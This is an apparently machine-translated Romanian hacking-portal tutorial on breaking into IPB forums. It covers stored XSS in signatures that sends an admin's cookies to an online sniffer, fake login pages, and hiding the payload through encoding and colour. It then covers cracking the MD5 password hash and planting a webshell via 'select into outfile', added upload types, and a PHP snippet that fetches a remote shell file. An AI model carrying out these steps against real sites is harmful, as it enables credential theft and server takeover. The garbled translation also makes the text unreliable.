Hacking bazei de date prin forumul ipb cu arhiva xss - portal soft al jocurilor, hack-urilor, programelor, articolelor

În general, am găsit o modalitate de a hack site-ul și acolo și bd, prin forumul ipb folosind xss.

Ce este xss?
XSS (Scriptarea în engleză a site-urilor de intersecție - "scripting crossite") - tipul de vulnerabilitate







sisteme interactive de informare pe web. XSS apare atunci când serverul generează

paginile din anumite motive primesc scripturi de utilizator. Specificitatea unor astfel de atacuri

este că, în loc să atace direct serverul, ei folosesc un vulnerabil

server ca mijloc de a ataca clientul.

Uneori termenul "CSS" este folosit pentru termen, dar nu există nici o confuzie cu cascadă

stil, utilizați abrevierea "XSS".

Acum XSS reprezintă aproximativ 15% din toate vulnerabilitățile detectate [1]. O lungă perioadă de timp

programatorii nu le-au acordat atenția cuvenită, considerându-le inofensive. Cu toate acestea, această opinie

în mod eronat: pe pagină sau în [Numai utilizatorii înregistrați și activi pot vedea link-urile] pot exista date foarte vulnerabile (de exemplu,

ID de sesiune al administratorului). Pe un site popular, scriptul poate aranja

DoS-ataky.
Funcționează cu acronimul

Exemplu de servere populare: Asterios ([Numai utilizatorii înregistrați și activi pot vedea link-uri))

XSS ar funcționa și pe șocuri, dar mesajele prea lungi sunt interzise (în semnătură) și în

mesajul aceste etichete sunt dezactivate.

În primul rând, trebuie să aflăm dacă metoda TRACE este activată pe forum dacă această metodă este activată

atunci va fi mult mai ușor pentru noi să accesăm zona administratorului.

Mai intai trebuie sa inregistram un sniffer online, l-am ales pe acesta

OnLine sniffer || XakNet ([Numai utilizatorii înregistrați și activi pot vedea linkurile))


1) Când mutați mouse-ul la _______________. jurnalele sunt trimise la sniffer.

] __________________________________________________ ____________________________
[/ acronim]
2) Acest cod în mod automat (chiar dacă mouse-ul nu este trimis) trimite jurnalul pentru a sniff DAR!

Funcționează numai în Opera!
[/ acronim]
] [/ acronim]

lipiți în cod (care este mai mare)

Acum du-te la forumul pe care vrem să-l hackem și să scrie un mesaj nou pentru tine pentru a verifica

[Numai utilizatorii înregistrați și activi pot vedea link-urile]

Apăsați trimite
Ne uităm la mesajul nostru din intrare, va exista un mesaj ca ">, dar nu atragem

atenție (dacă ați introdus al doilea cod care este mai mare, apoi mutați mouse-ul peste text

__________________) și du-te la sniffer noastre. XakNet ([Numai utilizatorii înregistrați și activi pot vedea linkurile))
Și arata jurnalele
Dacă nu există niciun jurnal, atunci nu ați folosit oper'y, ci (Internet Explorer sau firefox și

Dacă în jurnal există pași pas, atunci urmărirea este activată.

[Numai utilizatorii înregistrați și activi pot vedea link-urile]

Apoi, facem acest lucru:
1) Mergeți la profil și faceți clic pe Editare semnătură
2) Vă lipiți codul pe care l-ați testat
3) scriem administratorului site-ului (mai bine administratorul principal) scriem orice mesaj. Înțelegere! În cazul în care

introduceți codul în semnătură, atunci nu este necesar să inserați codul în mesaj. etc.

iar litera va fi citită și afișată semnătura dvs.! Dacă forumul interzice etichetele în

semn, apoi introduceți codul în mesaj și trimiteți administratorul. (Înainte de a introduce

semnătura zamaskkiruyte că nimic nu a fost văzut în semnătura despre acest lucru, a se vedea următorul)
4) Așteptăm ca administratorul să citească mesajul și că jurnalele vor fi în sniffer.
5) După primirea cookie-urilor (jurnalele) va exista o linie







pass_hash = c18c047c77589bpa989cc327509e7d5e;
18c047c77589bpa989cc327509e7d5e aceasta este parola noastră numai criptată în md5, acum

trebuie să îl decriptați cu ajutorul programului PasswordsPro sau să utilizați servicii online

decriptare.
c0llision - lm / md5 / ntlm distribuită parola de recuperare a rețelei ([Numai utilizatorii înregistrați și activi pot vedea link-uri])
Hashkiller - Index - MD5 cracken la hashkiller.com ([Numai utilizatorii înregistrați și activi pot vedea link-urile))

După decriptare, vi se va indica o trecere în care vom merge în zona de administrare, unde

cum să umpleți un aspect shell în continuare.

2.1) Există și un alt mod de a fura parolele false dacă metoda TRACE este oprită sau

.com zona poate fi trimisă la poșta la pochta.com)

1) Deschidere automată falsă într-un cadru (funcționează numai în opera!)
] [/ acronim]


2) Deschiderea falsului când se îndreaptă spre textul ________. (Lucrări peste tot)
__________________________________________________ _____________________] [/ acr

Și astfel, trimitem mesajul în sine (vedeți mai sus) cu codul de mai sus (cu

1 sau al doilea)
V-am citit mesajul și UPS-urile ați aruncat un fals (Acordați atenție

(nu uitați să-l ascundeți, așa cum este descris mai jos) sau mai bine în

semnătura și trimiteți administratorului la HP. Puteți scrie, de asemenea, un mesaj pe forum, așa că tu

puteți colecta parolele nu numai pe administratori.

Și aici, de exemplu, administratorul care a suspectat la dvs. într-o semnătură și a decis să verifice semnătura și

[Numai utilizatorii înregistrați și activi pot vedea link-urile]

Și avem personajele de genul ăsta
# X68; # X74; # X74; # X70; # X3a; # x2F; # x2F; # X6c; # x32; # X66; # X61; # x6E; # x2D; # 64; # x6

Și dacă administratorul vede asta aici _________________________________. și el va arăta în jur

suspicios, și să se uite din nou la semnătura și să obțină din nou o banană, pentru ce? pentru

Post2
Va exista ceva de genul:
[Numai utilizatorii înregistrați și activi pot vedea link-urile]
Aceasta este culoarea semnăturii, adică vom ascunde culoarea.
Codul nostru

În cazul în care # fff7ad culoarea noastră
Ca rezultat, am ascuns codul cât mai mult posibil:

Și așa că am intrat în zona admin și trebuie să umplem coaja, există mai multe moduri de a

Suport-> Gestionați SQL-> Running processes-> Run new query

selectați 0x3c3f706870696e666f28293b3f3e în outfile

'Z: /home/site.ru/ [Numai utilizatorii înregistrați și activi pot vedea linkurile]'

calea completă poate fi văzută astfel:

-> [Doar utilizatorii înregistrați și activi pot vedea link-urile] forum /? Act = attachcode = attach_upload_remove

Shell: [Doar utilizatorii înregistrați și activi pot vedea link-urile]

PS: Avem nevoie de dreptul

Forumuri-> Atașamente-> Tipuri de fișiere

Faceți clic pe "Adăugați un nou tip" -> "Utilizați un tip ca tip de bază?" - alegeți

"Bazat pe tipul de php" -> "Extensie de fișier atașat" - php3 (doar php se află în

lista implicită și la boot este redenumită automat la .txt) -> "Tip MIME

Stomp în profilul tău:

[Numai utilizatorii înregistrați și activi pot vedea link-urile]

[Numai utilizatorii înregistrați și activi pot vedea link-urile]

În mod preliminar, adăugăm tipurilor de fișiere decriptare .phtml și setăm tipul mime

fotografii.
Apoi adăugăm în profilurile utilizatorilor umplerea decodoarelor .phtml și mărimea oricăror (decât

cu atât mai bine cu atât mai bine).
Apoi, umpleți calm coajă și uita-te la proprietăți la coajă.
Motivele pentru care shell-ul nu a fost umplut: Există drepturi la avatare folder sau html / emoticons, costă


Mergeți la "setări" alegeți oricare dintre ele, faceți clic pe adăugați o nouă setare și în

"Rularea codului PHP
înainte de afișarea sau salvarea setărilor: "scrieți orice cod php, de exemplu:
-----------------------------------------

$ linky = "[Numai utilizatorii înregistrați și activi pot vedea link-ul] site_s_shell / shell.txt";
$ saved = "/ home // [Numai utilizatorii înregistrați și activi pot vedea linkul]";
$ din = fopen ("$ linky", "r");
$ la = fopen ("$ salvat", "w");
în timp ce (! feof ($ from))<
$ string = fgets ($ de la, 4096);
fputs ($ la, $ șir);
>
fclose ($ to);
ecou "făcut";
fclose ($ din);

Web shell-ul te va găsi) google.com pentru a te ajuta personal pe care îl folosesc
Dump.Ru - partajarea fișierelor, găzduire gratuită a fișierelor, nu este necesară înregistrarea ([Doar utilizatorii înregistrați și activi pot vedea link-uri))
sau
AK-74 Echipa de securitate Web Shell ([Numai utilizatorii înregistrați și activi pot vedea link-uri))

După ce ați inundat shell-ul, mergeți la rădăcina unde puteți găsi site-ul și căutați configul în cazul în care setările de conexiune la baza de date.
Pe asterios xss funcționează doar într-un mesaj atunci când răspundeți vă vede xss, deci este mai bine să nu riscați)

Aceasta este culoarea semnăturii, adică vom ascunde culoarea.
cod:
codul nostru
pe [* color = "# fff7ad"] codul nostru [/ color *] și explicăm că fără *

Adăugat după 37 de minute
Pentru a nu suferi de TRACE folosiți utilitarul [Doar utilizatorii înregistrați și activi pot vedea linkul]
Vă va arăta dacă urmărea este activată sau nu







Trimiteți-le prietenilor: